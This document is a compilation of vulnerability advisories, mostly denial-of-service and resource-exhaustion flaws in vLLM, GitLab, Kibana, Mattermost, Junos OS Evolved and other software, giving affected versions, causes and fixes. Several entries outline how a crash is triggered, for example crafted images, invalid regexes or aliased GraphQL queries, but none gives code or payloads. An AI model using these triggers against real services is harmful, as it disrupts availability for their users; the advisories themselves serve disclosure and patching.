vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0.
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 up to but excluding 0.9.0 have a Denial of Service (ReDoS) that causes the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg/CVE-2025-48942, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, users can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with correct ndim but incorrect shape (e.g. hidden dimension is wrong), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page). This issue has been patched in version 0.11.1.
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
vLLM, an inference and serving engine for large language models (LLMs), has a Regular Expression Denial of Service (ReDoS) vulnerability in the file `vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py` of versions 0.6.4 up to but excluding 0.9.0. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable. The pattern contains multiple nested quantifiers, optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking. Version 0.9.0 contains a patch for the issue.
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.8.0 and prior to 0.8.5 are affected by a critical performance vulnerability in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs. This issue has been patched in version 0.8.5.
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.5.2 and prior to 0.8.5 are vulnerable to denial of service and data exposure via ZeroMQ on multi-node vLLM deployment. In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts. Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker. By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher. This issue has been patched in version 0.8.5.
A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.
A denial-of-service vulnerability in the Mattermost Playbooks plugin allows an authenticated user to crash the server via multiple large requests to one of the Playbooks API endpoints.
An Allocation of Resources Without Limits or Throttling vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an authenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS).When specific SNMP GET operations or specific low-priviledged CLI commands are executed, a GUID resource leak will occur, eventually leading to exhaustion and resulting in FPCs to hang. Affected FPCs need to be manually restarted to recover. GUID exhaustion will trigger a syslog message like one of the following: evo-pfemand[<pid>]: get_next_guid: Ran out of Guid Space ... evo-aftmand-zx[<pid>]: get_next_guid: Ran out of Guid Space ... The leak can be monitored by running the following command and taking note of the values in the rightmost column labeled Guids: user@host> show platform application-info allocations app evo-pfemand/evo-pfemand In case one or more of these values are constantly increasing the leak is happening. This issue affects Junos OS Evolved: * All versions before 21.4R2-EVO, * 22.1 versions before 22.1R2-EVO. Please note that this issue is similar to, but different from CVE-2024-47505 and CVE-2024-47508.
Foundry Artifacts was found to be vulnerable to a Denial Of Service attack due to disk being potentially filled up based on an user supplied argument (size).
An Allocation of Resources Without Limits or Throttling vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an authenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS).When specific SNMP GET operations or specific low-priviledged CLI commands are executed, a GUID resource leak will occur, eventually leading to exhaustion and resulting in FPCs to hang. Affected FPCs need to be manually restarted to recover. GUID exhaustion will trigger a syslog message like one of the following: evo-pfemand[<pid>]: get_next_guid: Ran out of Guid Space ... evo-aftmand-zx[<pid>]: get_next_guid: Ran out of Guid Space ... The leak can be monitored by running the following command and taking note of the values in the rightmost column labeled Guids: user@host> show platform application-info allocations app evo-pfemand/evo-pfemand In case one or more of these values are constantly increasing the leak is happening. This issue affects Junos OS Evolved: * All versions before 21.4R3-S7-EVO, * 22.1 versions before 22.1R3-S6-EVO, * 22.2 versions before 22.2R3-EVO, * 22.3 versions before 22.3R3-EVO, * 22.4 versions before 22.4R2-EVO. Please note that this issue is similar to, but different from CVE-2024-47508 and CVE-2024-47509.
Mattermost versions 8.1.x before 8.1.12, 9.6.x before 9.6.1, 9.5.x before 9.5.3, 9.4.x before 9.4.5 fail to limit the number of active sessions, which allows an authenticated attacker to crash the server via repeated requests to the getSessions API after flooding the sessions table.
Teamplus Pro community discussion function has an ‘allocation of resource without limits or throttling’ vulnerability. A remote attacker with general user privilege posting a thread with large content can cause the receiving client device to allocate too much memory, leading to abnormal termination of this client’s Teamplus Pro application.
Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. Fuzz testing, provided by the CNCF, identified input to functions in the _strvals_ package that can cause an out of memory panic. The _strvals_ package contains a parser that turns strings in to Go structures. The _strvals_ package converts these strings into structures Go can work with. Some string inputs can cause array data structures to be created causing an out of memory panic. Applications that use the _strvals_ package in the Helm SDK to parse user supplied input can suffer a Denial of Service when that input causes a panic that cannot be recovered from. The Helm Client will panic with input to `--set`, `--set-string`, and other value setting flags that causes an out of memory panic. Helm is not a long running service so the panic will not affect future uses of the Helm client. This issue has been resolved in 3.9.4. SDK users can validate strings supplied by users won't create large arrays causing significant memory usage before passing them to the _strvals_ functions.
An Allocation of Resources Without Limits or Throttling vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an authenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS).When specific SNMP GET operations or specific low-priviledged CLI commands are executed, a GUID resource leak will occur, eventually leading to exhaustion and resulting in FPCs to hang. Affected FPCs need to be manually restarted to recover. GUID exhaustion will trigger a syslog message like one of the following: evo-pfemand[<pid>]: get_next_guid: Ran out of Guid Space ... evo-aftmand-zx[<pid>]: get_next_guid: Ran out of Guid Space ... The leak can be monitored by running the following command and taking note of the values in the rightmost column labeled Guids: user@host> show platform application-info allocations app evo-pfemand/evo-pfemand In case one or more of these values are constantly increasing the leak is happening. This issue affects Junos OS Evolved: * All versions before 21.2R3-S8-EVO, * 21.3 versions before 21.3R3-EVO; * 21.4 versions before 22.1R2-EVO, * 22.1 versions before 22.1R1-S1-EVO, 22.1R2-EVO. Please note that this issue is similar to, but different from CVE-2024-47505 and CVE-2024-47509.
Allocation of Resources Without Limits or Throttling in GitHub repository nocodb/nocodb prior to 0.92.0.
IBM Security Verify Information Queue 10.0.5, 10.0.6, 10.0.7, and 10.0.8 could allow a remote user to cause a denial of service due to improper handling of special characters that could lead to uncontrolled resource consumption.
A remote attacker with general user privilege can send a message to Teamplus Pro’s chat group that exceeds message size limit, to terminate other recipients’ Teamplus Pro chat process.
An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2 where abusing the API to filter branch and tags could lead to Denial of Service.
An allocation of resources without limits or throttling in Kibana can lead to a crash caused by a specially crafted payload to a number of inputs in Kibana UI. This can be carried out by users with read access to any feature in Kibana.
GitLab has remediated an issue in GitLab EE affecting all versions from 15.6 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an authenticated user to cause Denial of Service by uploading a malicious file and repeatedly querying it through GraphQl.
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an unauthenticated user to cause denial of service through CPU exhaustion by submitting specially crafted markdown files that trigger exponential processing in markdown preview.
Inserting certain large documents into a replica set could lead to replica set secondaries not being able to fetch the oplog from the primary. This could stall replication inside the replica set leading to server crash.
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user.
Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the safe_scrape_html function utilizes a user-controlled URL to issue a request to a remote server, however these requests are not rate-limited. While there are efforts to prevent DDoS by implementing a timeout on requests, it is possible for an attacker to issue a large number of requests to the server which will be handled in batches based on the configuration of the Mealie server. The chunking of responses is helpful for mitigating memory exhaustion on the Mealie server, however a single request to an arbitrarily large external file (e.g. a Debian ISO) is often sufficient to completely saturate a CPU core assigned to the Mealie container. Without rate limiting in place, it is possible to not only sustain traffic against an external target indefinitely, but also to exhaust the CPU resources assigned to the Mealie container. This vulnerability is fixed in 1.4.0.
Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users.
Improper Input Validation (CWE-20) in Kibana's Email Connector can allow an attacker to cause an Excessive Allocation (CAPEC-130) through a specially crafted email address parameter. This requires an attacker to have authenticated access with view-level privileges sufficient to execute connector actions. The application attempts to process specially crafted email format, resulting in complete service unavailability for all users until manual restart is performed.
An allocation of resources without limits or throttling in Elasticsearch can lead to an OutOfMemoryError exception resulting in a crash via a specially crafted query using an SQL function.
Resource Exhaustion in Mattermost Server versions 8.1.x before 8.1.10 fails to limit the size of the payload that can be read and parsed allowing an attacker to send a very large email payload and crash the server.
An issue has been discovered in GitLab CE/EE affecting all versions before 16.10.6, version 16.11 before 16.11.3, and 17.0 before 17.0.1. A runner registered with a crafted description has the potential to disrupt the loading of targeted GitLab web resources.
The Document and Media widget In Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.
OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue.
Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, authenticated users can submit crafted payloads to /drafts.json that cause O(n^2) processing in Base62.decode, tying up workers for 35-60 seconds per request. This affects all users as the shared worker pool becomes exhausted. This issue is patched in versions 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0. Lowering the max_draft_length site setting reduces attack surface but does not fully mitigate the issue, as payloads under the limit can still trigger the slow code path.
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query.
In Aris v10.0.23.0.3587512 and before, the file upload functionality does not enforce any rate limiting or throttling, allowing users to upload files at an unrestricted rate. An attacker can exploit this behavior to rapidly upload a large volume of files, potentially leading to resource exhaustion such as disk space depletion, increased server load, or degraded performance
An issue was discovered in GitLab CE/EE affecting all versions before 17.7.7, 17.8 prior to 17.8.5, and 17.9 prior to 17.9.2. where a denial of service vulnerability could allow an attacker to cause a system reboot under certain conditions.
Denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows anonymous user to cause denial of service against other anonymous users.
IBM Aspera Shares 1.9.0 through 1.10.0 PL6 does not properly rate limit the frequency that an authenticated user can send emails, which could result in email flooding or a denial of service.
An issue the background management system of Shanxi Internet Chuangxiang Technology Co., Ltd v1.0.1 allows a remote attacker to cause a denial of service via the index.html component.
A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.
Allocation of Resources Without Limits or Throttling in GitHub repository vriteio/vrite prior to 0.3.0.
A denial of service vulnerability was identified in GitLab CE/EE, affecting all versions from 15.11 prior to 16.6.7, 16.7 prior to 16.7.5 and 16.8 prior to 16.8.2 which allows an attacker to spike the GitLab instance resource usage resulting in service degradation.
CODESYS Control V3, Gateway V3, and HMI V3 before 3.5.15.30 allow uncontrolled memory allocation which can result in a remote denial of service condition.
A flaw was found in CRI-O that involves an experimental annotation leading to a container being unconfined. This may allow a pod to specify and get any amount of memory/cpu, circumventing the kubernetes scheduler and potentially resulting in a denial of service in the node.
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, application with a STOMP over WebSocket endpoint is vulnerable to a denial of service attack by an authenticated user.
n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.
A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The affected application does not properly limit the size of specific logs. This could allow an unauthenticated remote attacker to exhaust system resources by creating a great number of log entries which could potentially lead to a denial of service condition. A successful exploitation requires the attacker to have access to specific SIMATIC RTLS Locating Manager Clients in the deployment.